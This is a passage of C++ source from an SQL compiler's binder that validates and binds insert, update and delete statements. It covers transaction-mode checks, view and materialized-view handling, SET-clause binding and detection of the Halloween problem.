TransMode::IsolationLevel il; ActiveSchemaDB()->getDefaults().getIsolationLevel (il, CmpCommon::getDefault(ISOLATION_LEVEL_FOR_UPDATES)); verifyUpdatableTrans(&accessOptions(), CmpCommon::transMode(), il, sqlcodeA, sqlcodeB); if (sqlcodeA || sqlcodeB) { // 3140 The isolation level cannot be READ UNCOMMITTED. // 3141 The transaction access mode must be READ WRITE. if (sqlcodeA) *CmpCommon::diags() << DgSqlCode(sqlcodeA); if (sqlcodeB) *CmpCommon::diags() << DgSqlCode(sqlcodeB); bindWA->setErrStatus(); return this; } Int64 transId=-1; if ((isNoRollback() && (NOT (Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL)))) && ((CmpCommon::transMode()->getAutoCommit() != TransMode::ON_ ) || (NAExecTrans(0, transId)))) { // do not return an error if this is a showplan query being compiled // in the second arkcmp. const NAString * val = ActiveControlDB()->getControlSessionValue("SHOWPLAN"); if (NOT ((val) && (*val == "ON"))) { *CmpCommon::diags() << DgSqlCode(-3231); // Autocommit must be ON, bindWA->setErrStatus(); // if No ROLLBACK is specified in IUD statement syntax return this; } } if (isNoRollback() || (CmpCommon::transMode()->getRollbackMode() == TransMode::NO_ROLLBACK_)) { if ((child(0)->getGroupAttr()->isStream()) || (child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete()) || (updateCurrentOf())) { if (getOperatorType() == REL_UNARY_DELETE) *CmpCommon::diags() << DgSqlCode(-3234); else *CmpCommon::diags() << DgSqlCode(-3233); bindWA->setErrStatus(); return this; } } // The SQL standard as defined in ISO/IEC JTC 1/SC 32 date: 2009-01-12 // CD 9075-2:200x(E) published by ISO/IEC JTC 1/SC 32/WG 3 // "Information technology -- Database languages -- SQL -- // Part2: Foundation (SQL/Foundation)", page 920, section 14.14, // page 918, section 14.13, page 900, section 14.9, page 898, section 14.8 // does allow correlation names in update & delete statements. // Therefore, we delete this unnecessary restriction as part of the fix // for genesis solution 10-090921-4747: // Many places in this method assume the specified target table // has no correlation name -- indeed, Ansi syntax does not allow one -- // this assert is to catch any future syntax-extensions we may do. // // E.g., see code marked // ##SQLMP-SYNTAX-KLUDGE## // in SqlParser.y + SqlParserAux.cpp, // which add a non-Ansi corr name to all table refs // when they really only should add to SELECTed tables. // So here, in an INSERT/UPDATE/DELETEd table, // we UNDO that kludge. // //if (!getTableName().getCorrNameAsString().isNull()) { //CMPASSERT(SqlParser_NAMETYPE == DF_NSK || // HasMPLocPrefix(getTableName().getQualifiedNameObj().getCatalogName())); //getTableName().setCorrName(""); // UNDO that kludge! //} // Genesis 10-980831-4973 if (((getTableName().isLocationNameSpecified() || getTableName().isPartitionNameSpecified()) && (!Get_SqlParser_Flags(ALLOW_SPECIALTABLETYPE))) && (getOperatorType() != REL_UNARY_DELETE)) { *CmpCommon::diags() << DgSqlCode(-4061); // 4061 a partn not ins/upd'able bindWA->setErrStatus(); return this; } // -- Triggers // If this node is part of the action of a trigger, // then don't count the rows that are affected. if (bindWA->findNextScopeWithTriggerInfo() != NULL) { rowsAffected_ = DO_NOT_COMPUTE_ROWSAFFECTED; // Does the table name match the name of one of the transition tables? if (updatedTableName_.isATriggerTransitionName(bindWA)) { // 11020 Ambiguous or illegal use of transition name $0~string0. 
*CmpCommon::diags() << DgSqlCode(-11020) << DgString0(getTableName().getQualifiedNameAsString()); bindWA->setErrStatus(); return this; } } // Get the NATable for this object, and an initial ref count. // Set up stoi. // // We do not suppress mixed name checking in getNATable for R1 // from here, because prototype name executes through here. We // want to check prototype name. const NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return this; if (naTable && naTable->isHbaseTable()) hbaseOper() = TRUE; if ((CmpCommon::getDefault(ALLOW_DML_ON_NONAUDITED_TABLE) == DF_OFF) && naTable && naTable->getClusteringIndex() && (!naTable->getClusteringIndex()->isAudited()) // && !bindWA->isBindingMvRefresh() // uncomment if non-audit MVs are ever supported ) { *CmpCommon::diags() << DgSqlCode(-4211) << DgTableName( naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } // By setting the CQD OVERRIDE_SYSKEY to 'ON', the users // are allowed to specify a SYSKEY value on an INSERT. // We achieve this by treating a system column as a user column. // This support is only provided for key sequenced files // for MX and MP tables. if (getOperatorType() == REL_UNARY_INSERT && naTable->hasSystemColumnUsedAsUserColumn() && naTable->getClusteringIndex()->isEntrySequenced()) { *CmpCommon::diags() << DgSqlCode(-3410) << DgTableName(naTable->getTableName().getQualifiedNameAsString()); bindWA->setErrStatus(); return this; } Int32 beforeRefcount = naTable->getReferenceCount(); OptSqlTableOpenInfo *listedStoi = setupStoi(stoi_, bindWA, this, naTable, getTableName()); if (getOperatorType() == REL_UNARY_INSERT && NOT naTable->isInsertable()) { *CmpCommon::diags() << DgSqlCode(-4027) // 4027 table not insertable << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } if (NOT naTable->isUpdatable()) { *CmpCommon::diags() << DgSqlCode(-4028) // 4028 table not updatable << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; } if (naTable->isVerticalPartition()) { // LCOV_EXCL_START - cnu // On attempt to update an individual VP, say: 4082 table not accessible *CmpCommon::diags() << DgSqlCode(-4082) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return this; // LCOV_EXCL_STOP } if (naTable->isAnMV()) { // we currently don't allow updating (deleting) MVs in a trigger action if (bindWA->inDDL() && bindWA->isInTrigger ()) { *CmpCommon::diags() << DgSqlCode(-11051); bindWA->setErrStatus(); return this; } // This table is a materialized view. Are we allowed to change it? if ((getTableName().getSpecialType() != ExtendedQualName::MV_TABLE) && (getTableName().getSpecialType() != ExtendedQualName::GHOST_MV_TABLE)) { // The special syntax flag was not used - // Only on request MV allows direct DELETE operations by the user. MVInfoForDML *mvInfo = ((NATable *)naTable)->getMVInfo(bindWA); if (mvInfo->getRefreshType() == COM_ON_REQUEST && getOperatorType() == REL_UNARY_DELETE) { // Set NOLOG flag. setNoLogOperation(); } else { // Direct update is only allowed for User Maintainable MVs. if (mvInfo->getRefreshType() != COM_BY_USER) { // A Materialized View cannot be directly updated. *CmpCommon::diags() << DgSqlCode(-12074); bindWA->setErrStatus(); return this; } } } // If this is not an INTERNAL REFRESH command, make sure the MV is // initialized and available. 
// If this is FastDelete using parallel purgedata, do not enforce // that MV is initialized. if (!bindWA->isBindingMvRefresh()) { if (NOT ((getOperatorType() == REL_UNARY_DELETE) && (((Delete*)this)->isFastDelete()))) { if (naTable->verifyMvIsInitializedAndAvailable(bindWA)) return NULL; } } } if (naTable->isAnMVMetaData() && getTableName().getSpecialType() != ExtendedQualName::MVS_UMD) { if (getTableName().getPrototype() == NULL || getTableName().getPrototype()->getSpecialType() != ExtendedQualName::MVS_UMD) { // ERROR 12075: A Materialized View Metadata Table cannot be directly updated. *CmpCommon::diags() << DgSqlCode(-12075); bindWA->setErrStatus(); return this; } } if ((naTable->isSeabaseTable()) && (naTable->isSeabaseMDTable() || naTable->isSeabasePrivSchemaTable()) && (NOT naTable->isUserUpdatableSeabaseMDTable()) && (NOT Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL))) { // IUD on hbase metadata is only allowed for internal queries. *CmpCommon::diags() << DgSqlCode(-1391) << DgString0(naTable->getTableName().getQualifiedNameAsAnsiString()) << DgString1("metadata"); bindWA->setErrStatus(); return this; } else if ((naTable->isSeabaseTable()) && (naTable->getTableName().getSchemaName() == SEABASE_REPOS_SCHEMA) && (NOT Get_SqlParser_Flags(INTERNAL_QUERY_FROM_EXEUTIL))) { // IUD on hbase metadata is only allowed for internal queries. *CmpCommon::diags() << DgSqlCode(-1391) << DgString0(naTable->getTableName().getQualifiedNameAsAnsiString()) << DgString1("repository"); bindWA->setErrStatus(); return this; } if ((naTable->isHbaseTable()) && (naTable->isHbaseCellTable() || naTable->isHbaseRowTable()) && (CmpCommon::getDefault(HBASE_NATIVE_IUD) == DF_OFF)) { *CmpCommon::diags() << DgSqlCode(-4223) << DgString0("Insert/Update/Delete on native hbase tables or in CELL/ROW format is"); bindWA->setErrStatus(); return this; } if (naTable->isHiveTable() && (getOperatorType() != REL_UNARY_INSERT) && (getOperatorType() != REL_LEAF_INSERT)) { *CmpCommon::diags() << DgSqlCode(-4223) << DgString0("Update/Delete on Hive table is"); bindWA->setErrStatus(); return this; } NABoolean insertFromValuesList = (getOperatorType() == REL_UNARY_INSERT && (child(0)->getOperatorType() == REL_TUPLE || // VALUES(1,'b') child(0)->getOperatorType() == REL_TUPLE_LIST || // VALUES(1,'b'),(2,'Y') child(0)->getOperatorType() == REL_UNION)) || // VALUES..(with subquery inside the list) getOperatorType() == REL_LEAF_INSERT; // index type of inserts if((!insertFromValuesList) && (getOperatorType() == REL_UNARY_INSERT)) bindWA->setInsertSelectStatement(TRUE); // an update/delete node is created as an update/delete with child // of a scan node by parser. If this is the case, then no security // checks are needed on child Scan node. if ((getOperatorType() == REL_UNARY_UPDATE || getOperatorType() == REL_UNARY_DELETE) && (child(0) && (child(0)->getOperatorType() == REL_SCAN))) { Scan * scanNode = (Scan *)(child(0)->castToRelExpr()); scanNode->setNoSecurityCheck(TRUE); } // Setting the begin index for TableViewUsageList to zero, instead // of the bindWA->tableViewUsageList().entries(); Becasue // bindWA->tableViewUsageList().entries() sets the index to the current //entry in the list, which excludes previous statements executed in a CS. CollIndex begSrcUsgIx = 0; if (!insertFromValuesList) { // // Create a new table name scope for the source table (child node). // Bind the source. // Reset scope context/naming. 
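    // For example, in "insert into t select * from s" the SELECT subtree is
    // the child bound here; VALUES-style inserts take the else branch below
    // and are handled later by Insert::bindNode.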
// bindWA->getCurrentScope()->xtnmStack()->createXTNM(); bindChildren(bindWA); if (bindWA->errStatus()) return this; bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); // QSTUFF // we currently don't support streams and embedded updates // for "insert into select from" statements. if (getOperatorType() == REL_UNARY_INSERT){ if (child(0)->getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4170); bindWA->setErrStatus(); return this; } if (child(0)->getGroupAttr()->isEmbeddedUpdateOrDelete() || child(0)->getGroupAttr()->isEmbeddedInsert()){ *CmpCommon::diags() << DgSqlCode(-4171) << DgString0(getGroupAttr()->getOperationWithinGroup()); bindWA->setErrStatus(); return this; } } // binding a generic update within a generic update // can only occur when binding an updatable view containing // an embedded delete or embedded update. We don't continue // binding the generic update and but return the bound scan node. // the scan node may be either a base table scan or a RenameTable // node in case we are updating a view // Since an embedded generic update may have referred to the OLD // and NEW table we set a binder flag causing the table name to // be changed to the name of the underlying scan table in the // RelRoot on top of the generic update. Since we // know that the normalizer has checked before allowing an update // on the view that not both, i.e.new and old column values have been // referred this is a safe operation. if (returnScanNode){ // this line is a hack to get through Update::bindNode on the return setTableDesc(getScanNode()->getTableDesc()); bindWA->setInGenericUpdate(inGenericUpdate); bindWA->setRenameToScanTable (TRUE); NATable *nTable = bindWA->getNATable(getTableName()); // decr once for just getting it here // and again to compensate for the reference taken out // previously which becomes obsolete since we just return a scan node nTable->decrReferenceCount(); nTable->decrReferenceCount(); return getViewScanNode(); } // QSTUFF } else { // else, Insert::bindNode does VALUES(...) in its Assign::bindNode loop // in particular, it does VALUES(..,DEFAULT,..) } #ifndef NDEBUG GU_DEBUG_Display(bindWA, this, "incoming", NULL, TRUE); #endif // QSTUFF // in case of an insert operation we don't set it initially in order // to prevent that an embedded update or delete may be accidentially // removed from a source view. However we need it for binding the // target because it may be a view and its embedded updates have to // be removed. if (getOperatorType() == REL_UNARY_INSERT) inGenericUpdate = bindWA->setInGenericUpdate(TRUE); CMPASSERT(NOT(updateCurrentOf() && getGroupAttr()->isEmbeddedUpdateOrDelete())); // this is a patch to allow for embedded updates in view definitions ParNameLocList * pLoc = NULL; if (getGroupAttr()->isEmbeddedUpdate()) { pLoc = bindWA->getNameLocListPtr(); bindWA->setNameLocListPtr(NULL); } // QSTUFF // Allocate a TableDesc and attach it to the node. // // Note that for Update/Delete, which always have a Scan node attached // (see below), we cannot reuse the Scan's TableDesc: // GenMapTable.C doesn't find the proper ValueIds when processing an // update/delete on a table with an index. // So we must always create a new (target) TableDesc, always a base table. // // Note that bindWA->getCurrentScope()->setRETDesc() is implicitly called: // 1) by createTableDesc, setting it to this new (target) base table; // 2) by bindView (if called), resetting it to the view's RenameTable RETDesc // atop the new (target) table. 
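  // naTableTop keeps the NATable of the named target (possibly a view), while
  // naTable may be re-pointed below at the underlying scan's base table.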
// const NATable *naTableTop = naTable; NABoolean isView = naTable->getViewText() != NULL; RelExpr *boundView = NULL; // ## delete when done with it? Scan *scanNode = NULL; if (getOperatorType() == REL_UNARY_INSERT || getOperatorType() == REL_LEAF_INSERT) { if (isView) { // INSERT into a VIEW: // // Expand the view definition as if it were a Scan child of the Insert // (like all children, must have its own table name scope). // bindWA->getCurrentScope()->xtnmStack()->createXTNM(); boundView = bindWA->bindView(getTableName(), naTable, accessOptions(), removeSelPredTree(), getGroupAttr()); #ifndef NDEBUG GU_DEBUG_Display(bindWA, this, "bv1", boundView); #endif if (bindWA->errStatus()) return this; scanNode = boundView->getScanNode(); bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); } } else if (getOperatorType() == REL_UNARY_UPDATE || getOperatorType() == REL_UNARY_DELETE) { scanNode = getScanNode(); } if (updateCurrentOf()) { CMPASSERT(scanNode); scanNode->bindUpdateCurrentOf(bindWA, (getOperatorType() == REL_UNARY_UPDATE)); if (bindWA->errStatus()) return this; } // As previous comments indicated, we're creating a TableDesc for the target, // the underlying base table. Here we go and do it: NABoolean isScanOnDifferentTable = FALSE; if (isView) { // This binding of the view sets up the target RETDesc. // This is the first bindView for UPDATE and DELETE on a view, // and the second for INSERT into a view (yes, we *do* need to do it again). boundView = bindWA->bindView(getTableName(), naTable, accessOptions(), removeSelPredTree(), getGroupAttr(), TRUE); // QSTUFF setTableDesc(boundView->getScanNode()->getTableDesc()); if ((getOperatorType() == REL_INSERT)|| (getOperatorType() == REL_UNARY_INSERT) || (getOperatorType() == REL_LEAF_INSERT)) { ((Insert *)this)->setBoundView(boundView); } // for triggers if (scanNode) { const NATable *naTableLocal = scanNode->getTableDesc()->getNATable(); if ((naTableLocal != naTable) && (naTableLocal->getSpecialType() == ExtendedQualName::TRIGTEMP_TABLE)) isScanOnDifferentTable = TRUE; } } else if (NOT (getUpdateCKorUniqueIndexKey() && (getOperatorType() == REL_UNARY_INSERT))) { // an insert that is introduced to implement a phase of update primary key already // has the right tabledesc (obtained from the update that it is replacing), so // do not create another tablesdesc for such an insert. if (scanNode) naTable = scanNode->getTableDesc()->getNATable(); CorrName tempName(naTableTop->getTableName(), bindWA->wHeap(), "", getTableName().getLocationName(), getTableName().getPrototype()); tempName.setUgivenName(getTableName().getUgivenName()); tempName.setSpecialType(getTableName().getSpecialType()); // tempName.setIsVolatile(getTableName().isVolatile()); TableDesc * naTableToptableDesc = bindWA->createTableDesc( naTableTop, tempName); if(naTableToptableDesc) { naTableToptableDesc->setSelectivityHint(NULL); naTableToptableDesc->setCardinalityHint(NULL); } setTableDesc(naTableToptableDesc); // Now naTable has the Scan's table, and naTableTop has the GU's table. isScanOnDifferentTable = (naTable != naTableTop); } if (bindWA->errStatus()) return this; // QSTUFF // in case of a delete or update we may have to bind set clauses. // first we bind the left target column, second we bind the right hand side // we also have to separate the set on rollback clauses in a separate // list. The set clauses generate a newRecExpr list, the set on rollback // clause generate a newRecBeforeExpr list. 
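  // Assign nodes whose onRollback() flag is set came from SET ON ROLLBACK
  // clauses and are collected into the newRecBeforeExpr list; ordinary SET
  // assignments populate newRecExpr.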
// we add the old to new valueid map as it allows us to generate // a subset operator in the presence of order by. the compiler // needs to understand that the old and new valueids are identical // inlined trigger may update and scan different tables if ((getOperatorType() == REL_UNARY_DELETE) && (!isScanOnDifferentTable && !getUpdateCKorUniqueIndexKey())) { const ValueIdList &dkeys = getTableDesc()->getClusteringIndex()->getClusteringKeyCols(); const ValueIdList &skeys = scanNode->getTableDesc()->getClusteringIndex()->getClusteringKeyCols(); CollIndex j = skeys.entries(); for (CollIndex i = 0; i < j; i++) { oldToNewMap().addMapEntry(skeys[i].getItemExpr()->getValueId(), dkeys[i].getItemExpr()->getValueId()); } } ItemExpr *recExpr = removeNewRecExprTree(); if (recExpr && (getOperatorType() == REL_UNARY_DELETE || getOperatorType() == REL_UNARY_UPDATE)) { ItemExprList recList(recExpr, bindWA->wHeap()); ItemExprList recBeforeList(bindWA->wHeap()); SET(short) stoiColumnSet(bindWA->wHeap()); // in case a delete statement has a recEpxr, set on rollback // clauses have been defined and need to be bound // as part of binding any set on rollback clause we have check // that no contraints are defined for the specific clauses; otherwise // the statement is rejected. // the target columns are bound to the update table, the source // columns are bound to the scan table if (getOperatorType() == REL_UNARY_DELETE){ recBeforeList.insert(recList); bindUpdateExpr(bindWA,recExpr,recBeforeList,boundView,scanNode,stoiColumnSet,TRUE); if (bindWA->errStatus()) return this; } // in case of an update operator we have to separate the set and // set on rollback clauses if (getOperatorType() == REL_UNARY_UPDATE) { CMPASSERT(recList.entries()); NABoolean leftIsList = FALSE; NABoolean rightIsList = FALSE; NABoolean legalSubqUdfExpr = FALSE; for (CollIndex i = 0;i < recList.entries(); i++){ CMPASSERT(recList[i]->getOperatorType() == ITM_ASSIGN); if (recList[i]->child(0)->getOperatorType() == ITM_ITEM_LIST) leftIsList = TRUE; if (recList[i]->child(1)->getOperatorType() == ITM_ITEM_LIST) rightIsList = TRUE; if (((Assign *)recList[i])->onRollback()){ // On rollback clause currently not allowed with update lists. if ((leftIsList) || (rightIsList)) { *CmpCommon::diags() << DgSqlCode(-3242) << DgString0(" ON ROLLBACK not supported with SET lists."); bindWA->setErrStatus(); return this; } // CMPASSERT((NOT leftIsList) && (NOT rightIsList)) recBeforeList.insert(recList[i]); recList.removeAt(i); i--; } } if ((leftIsList) && (NOT rightIsList) && (recList.entries() == 1) && ((recList[0]->child(1)->getOperatorType() == ITM_ROW_SUBQUERY) || (recList[0]->child(1)->getOperatorType() == ITM_USER_DEF_FUNCTION))) { ItemExpr * expr = NULL; // Both Subqueries and UDFs are now using the ValueIdProxy // to carry the each of the valueIds representing the select list // or UDF outputs. The transformation of the ValueIdProxy will do the // right thing, and we don't need setSubqInUpdateAssing() anymore. // Bind the subquery if (recList[0]->child(1)->getOperatorType() == ITM_ROW_SUBQUERY) { RowSubquery * rs = (RowSubquery*)(recList[0]->child(1)->castToItemExpr()); // Not sure that we ever have a subquery without a REL_ROOT // left this additional check from the old code. 
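            // This covers updates of the general form SET (a, b) = (select ...)
            // or = udf(...); binding the subquery/UDF here makes its output
            // degree known before the assignment list is flattened below.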
if (rs->getSubquery()->getOperatorType() == REL_ROOT) { rs = (RowSubquery *) rs->bindNode(bindWA); if (bindWA->errStatus()) return this; legalSubqUdfExpr = TRUE; expr = (ItemExpr *) rs; } } else { UDFunction * rudf = (UDFunction*)(recList[0]->child(1)->castToItemExpr()); // Need to bind the UDFunction to get its outputs. rudf = (UDFunction *) rudf->bindNode(bindWA); if (bindWA->errStatus()) return this; legalSubqUdfExpr = TRUE; expr = (ItemExpr *) rudf; } // Update the recList with the bound itemExpr recList[0]->child(1) = expr; // Use the ItemExprList to flatten the Subquery or UDF ItemExprList *exprList = (ItemExprList *) new(bindWA->wHeap()) ItemExprList(expr,bindWA->wHeap()); // Convert the ItemExprList to a Tree ItemExpr * ie = exprList->convertToItemExpr(); ie = ie->bindNode(bindWA); if (bindWA->errStatus()) return this; Assign * assignNode = (Assign *)recList[0]; assignNode->child(1) = ie; rightIsList = TRUE; } if ((leftIsList) || (rightIsList)) // some elements as lists { ItemExprList newRecList(bindWA->wHeap()); for (CollIndex i = 0; i < recList.entries(); i++) { Assign * assignNode = (Assign *)recList[i]; // Need to bind any UDFs or Subqieries in the expression // so that we know the degree before we expand the list. assignNode->child(0) = assignNode->child(0)->bindUDFsOrSubqueries(bindWA); if (bindWA->errStatus()) return this; // Need to bind any UDFs or Subqieries in the expression // so that we know the degree before we expand the list. assignNode->child(1) = assignNode->child(1)->bindUDFsOrSubqueries(bindWA); if (bindWA->errStatus()) return this; ItemExprList leftList(assignNode->child(0), bindWA->wHeap()); ItemExprList rightList(assignNode->child(1), bindWA->wHeap()); Lng32 numLeftElements = (Lng32) leftList.entries(); Lng32 numRightElements = (Lng32) rightList.entries(); // See if ALLOW_SUBQ_IN_SET is enabled. It is enabled if // the default is ON, or if the default is SYSTEM and // ALLOW_UDF is ON. NABoolean allowSubqInSet_Enabled = FALSE; DefaultToken allowSubqTok = CmpCommon::getDefault(ALLOW_SUBQ_IN_SET); if ((allowSubqTok == DF_ON) || (allowSubqTok == DF_SYSTEM)) allowSubqInSet_Enabled = TRUE; if (!allowSubqInSet_Enabled) { for (CollIndex j = 0; j < rightList.entries(); j++) { if (((numLeftElements > 1) || (numRightElements > 1)) && (((rightList[j]->getOperatorType() == ITM_ROW_SUBQUERY) || (rightList[j]->getOperatorType() == ITM_VALUEID_PROXY)) && (legalSubqUdfExpr == FALSE))) { *CmpCommon::diags() << DgSqlCode(-3242) << DgString0(" Multiple elements or multiple subqueries are not allowed in this SET clause."); bindWA->setErrStatus(); return this; } } } if (numLeftElements != numRightElements) { *CmpCommon::diags() << DgSqlCode(-4023) << DgInt0(numRightElements) << DgInt1(numLeftElements); bindWA->setErrStatus(); return this; } // create newRecList with one Assign node for each element. for (CollIndex k = 0; k < leftList.entries(); k++) { ItemExpr * leftIE = leftList[k]; ItemExpr * rightIE = rightList[k]; Assign *assign = new (bindWA->wHeap()) Assign(leftIE, rightIE); // We do not bind the above Assign as it will be done // in bindUpdateExpr below. 
(bug #1893) newRecList.insert(assign); } } // for bindUpdateExpr(bindWA,recExpr,newRecList,boundView,scanNode,stoiColumnSet); if (bindWA->errStatus()) return this; } // some elements as lists else { // no elements as lists if (recList.entries()){ bindUpdateExpr(bindWA,recExpr,recList,boundView,scanNode,stoiColumnSet); if (bindWA->errStatus()) return this; } } if (recBeforeList.entries()){ bindUpdateExpr(bindWA,recExpr,recBeforeList,boundView,scanNode,stoiColumnSet,TRUE); if (bindWA->errStatus()) return this; } } // UNARY_UPDATE // now we record the columns updated for the SqlTableOpenInfo if (listedStoi) { listedStoi->getStoi()->setColumnListCount((short)stoiColumnSet.entries()); short *stoiColumnList = new (bindWA->wHeap()) short[stoiColumnSet.entries()]; for (CollIndex i = 0; i < stoiColumnSet.entries(); i++) { stoiColumnList[i] = stoiColumnSet[i]; listedStoi->addUpdateColumn(stoiColumnSet[i]); } listedStoi->getStoi()->setColumnList(stoiColumnList); } // the previous implementation assumed that the scope points // to the scan table; we don't want to disturb the code and // make that happen -- #ifndef NDEBUG GU_DEBUG_Display(bindWA, this, "u"); #endif bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } // QSTUFFF CollIndex endSrcUsgIx = bindWA->tableViewUsageList().entries(); if ((!isScanOnDifferentTable) && (((getOperatorType() == REL_UNARY_INSERT) && !insertFromValuesList && !getGroupAttr()->isEmbeddedInsert()) || (getOperatorType() == REL_UNARY_UPDATE) || (getOperatorType() == REL_UNARY_DELETE))){ // Special handling of statements that could suffer the // Halloween problem, e.g., "insert into t select from t" // or "insert into v select from t", if v references t DBG( if (getenv("TVUSG_DEBUG")) bindWA->tableViewUsageList().display(); ) const NATable *naTableBase = naTable; const QualifiedName *viewName = NULL; if (isView) { // Currently, per Ansi rules, we can only insert through a view if // there is a single underlying base table without joins or unions. // Since we are binding the view twice for INSERTS, // the variable beforeRefcount for the *single* base table has to be 2. // beforeRefcount = beforeRefcount + 1; naTableBase = getTableDesc()->getNATable(); viewName = &naTable->getTableName(); } if ((getOperatorType() == REL_UNARY_UPDATE || getOperatorType() == REL_UNARY_DELETE) && (child(0)->getOperatorType() == REL_SCAN)) { // The table is referenced twice; once for the update/delete and // the second time for the scan below it. beforeRefcount = beforeRefcount + 1; } const QualifiedName &tableBaseName = naTableBase->getTableName(); Int32 afterRefcount = naTableBase->getReferenceCount(); NABoolean isSGTableType = getTableName().getSpecialType() == ExtendedQualName::SG_TABLE; NAString viewFmtdList(bindWA->wHeap()); Int32 baseSeenInSrc = 0; // The views on the table do not need to be obtained // if the table type is a SEQUENCE GENERATOR if (!isSGTableType) baseSeenInSrc = bindWA->tableViewUsageList().getViewsOnTable( begSrcUsgIx, endSrcUsgIx, bindWA->viewCount(), tableBaseName, getTableName().getSpecialType(), viewName, viewFmtdList); NABoolean halloween = FALSE; if (CmpCommon::getDefault(R2_HALLOWEEN_SUPPORT) == DF_ON) { if (beforeRefcount != afterRefcount) { // Check to see if we can support this update. 
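      // checkForHalloweenR2() tries to mark the self-referencing subquery
      // scans so the optimizer can choose a Halloween-safe plan; if it cannot,
      // halloween is set and the statement is rejected below (error 4026/4060).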
// if(checkForHalloweenR2(afterRefcount - beforeRefcount)) { halloween = TRUE; } } else { Scan *scanSrc = getScanNode(FALSE/*no assert*/); if ((baseSeenInSrc > beforeRefcount) && ((scanSrc && scanSrc->getTableName().isLocationNameSpecified())|| (getTableName().isLocationNameSpecified()))) { halloween = TRUE; } if (Get_SqlParser_Flags(ALLOW_SPECIALTABLETYPE)) { if ((scanSrc && scanSrc->getTableName().isLocationNameSpecified())|| (getTableName().isLocationNameSpecified())){ // Do not enforce Halloween check if it is a // partition only operation. // We assume the programmer knows what he's doing // -- hopefully, by doing insert/update/delete // operations as part of Partition Management // (Move Partition Boundary or Split Partition or // Merge Partition. See TEST057 and TEST058) halloween = FALSE; } } } if (halloween) { CMPASSERT(!(isView && viewFmtdList.isNull())); *CmpCommon::diags() << DgSqlCode(viewFmtdList.isNull() ? -4026 : -4060) << DgTableName( tableBaseName.getQualifiedNameAsAnsiString()) << DgString0(viewFmtdList); bindWA->setErrStatus(); return this; } } else { // Support for self-referencing updates/Halloween problem. if (beforeRefcount != afterRefcount) { setAvoidHalloween(TRUE); bindWA->getTopRoot()->setAvoidHalloween(TRUE); // Decide if access mode (default or specified) is compatible // with the use of DP2 locks. If access mode was specified, // it is a property of the naTableBase. NABoolean cannotUseDP2Locks = naTableBase->getRefsIncompatibleDP2Halloween(); // Now check the transaction isolation level, which can override // the access mode. Note that il was initialized above for the // check for an updatable trans, i.e., errors 3140 and 3141. if((CmpCommon::transMode()->ILtoAT(il) == REPEATABLE_ ) || (CmpCommon::transMode()->ILtoAT(il) == STABLE_ ) || (CmpCommon::transMode()->ILtoAT(il) == BROWSE_ )) cannotUseDP2Locks = TRUE; // Save the result with this GenericUpdate object. It will be // used when the nextSubstitute methods of TSJFlowRule or TSJRule // call GenericUpdate::configTSJforHalloween. if (NOT getHalloweenCannotUseDP2Locks()) setHalloweenCannotUseDP2Locks(cannotUseDP2Locks); // Keep track of which table in the query is the self-ref table. // This is a part of the fix for solution 10-071204-9253. ((NATable *)naTableBase)->setIsHalloweenTable(); } else { Scan *scanSrc = getScanNode(FALSE/*no assert*/); if ((baseSeenInSrc > beforeRefcount) && ((scanSrc && scanSrc->getTableName().isLocationNameSpecified())|| (getTableName().isLocationNameSpecified()))) { halloween = TRUE; } if (Get_SqlParser_Flags(ALLOW_SPECIALTABLETYPE)) { if ((scanSrc && scanSrc->getTableName().isLocationNameSpecified())|| (getTableName().isLocationNameSpecified())){ // Do not enforce Halloween check if it is a // partition only operation. // We assume the programmer knows what he's doing // -- hopefully, by doing insert/update/delete // operations as part of Partition Management // (Move Partition Boundary or Split Partition or // Merge Partition. See TEST057 and TEST058) halloween = FALSE; } } if (halloween) { CMPASSERT(!(isView && viewFmtdList.isNull())); *CmpCommon::diags() << DgSqlCode(viewFmtdList.isNull() ? -4026 : -4060) << DgTableName( tableBaseName.getQualifiedNameAsAnsiString()) << DgString0(viewFmtdList); bindWA->setErrStatus(); return this; } } } } // Bind the base class. // Allocate an empty RETDesc and attach it to this node, *but* leave the // currently scoped RETDesc (that of naTableTop) as is, for further binding // in caller Insert::bindNode or LeafInsert/LeafDelete::bindNode. 
// RelExpr *boundExpr = bindSelf(bindWA); CMPASSERT(boundExpr == this); // assumed by RETDesc/RI/IM code below if (bindWA->errStatus()) return boundExpr; setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); // Copy the check constraints to the private memory of the GenericUpdate. // checkConstraints() = getTableDesc()->getCheckConstraints(); // Create a key expression for the table to be updated. // The code specific to the Insert node is handled in Insert::bindNode. // if (getOperatorType() == REL_UNARY_UPDATE || getOperatorType() == REL_UNARY_DELETE) { // SQL syntax requires (and the parser ensures) that a direct descendant // (passing thru views) of an update/delete node is a scan node on the // same table that is being updated (note that normalizer transformations // may change this at a later time). // An exception to this rule happens when before triggers are inlined. // In this case, the update/delete on the subject table is driven by // a Scan on a temp table. The primary key columns of the subject table are // a subset of the primary key columns of the temp table, and using the // same column names, but not neccessarily in the same order. // // Update/Delete nodes require expressions in their newRecExpr that can // be used to form the primary key of the table to update/delete. // const NAColumnArray &keyColArray = getTableDesc()->getNATable()->getClusteringIndex()->getIndexKeyColumns(); CollIndex numKeyCols = keyColArray.entries(); const NAColumnArray &scanColArray = scanNode->getTableDesc()->getNATable()->getNAColumnArray(); for (CollIndex i = 0; i < numKeyCols; i++) { // The scan node and the update/delete node both use the SAME table, // so their column names are also the same. // Lng32 colPos = keyColArray[i]->getPosition(); ItemExpr *guCol = getTableDesc()->getColumnList()[colPos].getItemExpr(); ItemExpr *scanCol; // - Triggers if (!isScanOnDifferentTable) scanCol = scanNode->getTableDesc()->getColumnList()[colPos].getItemExpr(); else { // Make sure this is a BaseColumn. CMPASSERT(guCol->getOperatorType() == ITM_BASECOLUMN); // Find the column name. const NAString& colName = ((BaseColumn *)guCol)->getColName(); // Find a column with the same name, in the table from 